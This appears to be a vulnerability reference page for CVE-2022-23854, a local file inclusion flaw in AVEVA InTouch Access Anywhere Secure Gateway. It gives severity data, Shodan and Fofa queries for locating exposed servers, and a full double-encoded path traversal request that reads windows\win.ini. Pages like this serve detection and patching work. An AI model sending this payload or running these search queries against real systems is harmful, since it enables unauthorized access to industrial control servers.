🔙 목록으로 돌아가기

CVE-2022-23854: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion

TitleAVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
AuthorFor3stCo1d
SeverityHigh
ImpactAn attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.
RemediationApply the latest security patches or updates provided by AVEVA to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.92614
CVE IDCVE-2022-23854
CWE IDCWE-22,CWE-23
Shodan Queryhttp.html:"InTouch Access Anywhere"http.html:"intouch access anywhere"
Fofa Querybody="intouch access anywhere"
Tags cve cve2022 lfi packetstorm aveva intouch vuln

🔍 Vulnerability Description

AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.

🌐 HTTP Request

GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23854.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23854.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A